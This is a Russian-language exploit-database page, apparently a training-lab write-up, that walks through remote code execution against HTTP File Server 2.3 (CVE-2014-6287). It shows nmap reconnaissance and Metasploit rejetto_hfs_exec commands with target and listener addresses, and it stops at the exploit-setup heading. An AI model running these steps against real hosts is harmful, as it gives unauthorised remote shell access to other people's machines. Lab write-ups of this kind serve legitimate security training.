Sploitus

HFS_EXPLOIT_PROJECT

kitploit · 2026-09-02

Exploit Code

MARKDOWN48 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SAGE954526-HFS_EXPLOIT_PROJECT
# HFS_EXPLOIT_PROJECT

Metasploit RCE на HFS 2.3 - CVE-2014-62

🔖 Название проекта

root@kitploit:~
    
    
    > Удаленное выполнение кода через HTTP File Server (HFS 2.3)
    

⚙ Используемые инструменты • Kali Linux • Nmap • Metasploit • Цель: HFS 2.3 на Windows 7

🔐 Детали уязвимости • Название: CVE-2014-6287 • Тип: удаленное выполнение кода • Причина: непроверенный ввод в скриптах HFS • Воздействие: неаутентифицированный доступ к оболочке

🔍 Методология (пошагово)

🔹 Шаг 1: Сбор информации (Nmap)

root@kitploit:~
    
    
    •    nmap -sV demo.ine.local (ip целевой машины) 
    •    обнаружен открытый порт: 80
    •    сервис: rejetto HTTP file server 2.3
    

## Сканирование Nmap

![Nmap](https://assets.kitploit.com/production/public/readmes/31780/47533d444dd591b1fbb60566a6c57a6a497b7cccf4bd3aaf73ae9967096bf81d.png)

🔹 Шаг 2: Эксплуатация (Metasploit)

root@kitploit:~
    
    
    • Msfconsole
    • Поиск HFS или rejetto
    • use exploit/windows/http/rejetto_hfs_exec
    • set RHOST 192.168.1.100
    • set RPORT 80
    • set LHOST 192.168.1.101
    • run
    

## Настройка эксплойта